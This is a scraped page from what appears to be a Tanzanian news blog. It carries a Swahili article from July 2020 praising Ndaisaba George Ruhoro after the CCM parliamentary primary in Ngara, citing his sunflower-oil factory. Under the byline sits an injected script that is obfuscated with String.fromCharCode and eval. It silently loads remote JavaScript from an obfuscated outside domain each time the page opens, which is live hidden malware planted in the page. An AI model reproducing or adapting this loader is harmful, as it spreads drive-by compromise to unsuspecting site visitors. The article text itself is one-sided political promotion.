Recent Comments

WASEMAVYO WANANCHI NGARA, BAADA YA KURA ZA MAONI CCM –UBUNGE

By Simamia Journal Jul 24, 2020
<script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>
Ndaisaba George Ruhoro,akiwa na wananchi waliofika kukamua mafuta ya Alizeti kiwandani kwake

KWA VIGEZO HIVI HATA UKIRUDIWA UCHAGUZI NGARA, NDAISABA GEORGE RUHORO ANASHINDA KWA KISHINDO KIKUBWA TENA MARA DUFU.

Wananmtaja NDAISABA kuwa mgombea pekee aliye tumia muda mwingi kukaa na wakulima mwaka 2018 na 2019 akiwahamasisha kulima zao la alizeti. Nusu ya wajumbe wa mkutano mkuu wa CCM walioshiriki kwenye Uchaguzi ni wakulima wanao shinda na NDAISABA. Ni miongoni mwa wakulima 502 walionufaika na mradi wa kilimo cha Alizeti,wakapewa mbegu na kuhamasishwa kuendeleza kilimo ambacjo sasa kinawanufaisha baada ya kujengwa na kuanzishwa kiwanda cha kukamua mafuta ya zao hilo

 NDAISABA, amefahamika zaidi baada ya kujenga kiwanda cha kukamua na kusindika mafuta ya alizeti. Kiwanda kimeanza kushusha bei ya mafuta na Mashudu Ngara. Wakulima wamemuelewa kweli kweli NDAISABA.  Hivi sasa mafuta ya kupikia yanayotumika wilayani Ngara, yanazalishwa katika kiwanda hicho.

NDAISABA ni mgombea pekee mwenye wazazi wanao tokea Tarafa mbili tofauti. Mama anatoka Rulenge na Baba anatoka Kanazi. Baba yake amekuwa afisa mtendaji kwa muda mrefu,mkulima maarufu wa zao la Kahawama pia. Nusu ya Wapiga kura katika uchaguzi wa kura za maoni uliompa ushindi,wanatoka ndani ya Tarafa hizo. Nani ataweza kumshinda NDAISABA?.

NDAISABA George Ruhoro, ni miongoni mwa Vijana wasomi walio kuwa wanaliliwa na wananchi wa NGARA.

Wananchi, wanasisitiza “Jamani, NDAISABA GEORGE RUHORO alijipanga na amepata kura za halari kabisa”. Ingetokea uchaguzi ukarudiwa, kura zake zitaongezeka mara dufu baadala ya kupungua.

Vijijini kumelipuka kwa shangwe. Inasemekana NDAISABA kakimbia nyumbani kwake baada ya mamia ya wananchi kumiminika kila siku kumfuata kumpongeza hali inayobidi kuwapa viti na maji ya kunywa. Hali hiyo imemwogopesha na kuamua kuondoka kwa muda kuepuka kuvunja maelekezo ya CCM ya kutofanya Sherehe.

WANANGARA WAMECHAGUA CHAGUO SAHIHI NA JIMBO LIMETULIA KWELI KWELI, NA LIPO TAYARI KWA UCHAGUZI MKUU.

By Simamia Journal

Tangaza nasi. www.simamia.com YouTube Chanel: www.youtube.com/c/SimamiaTv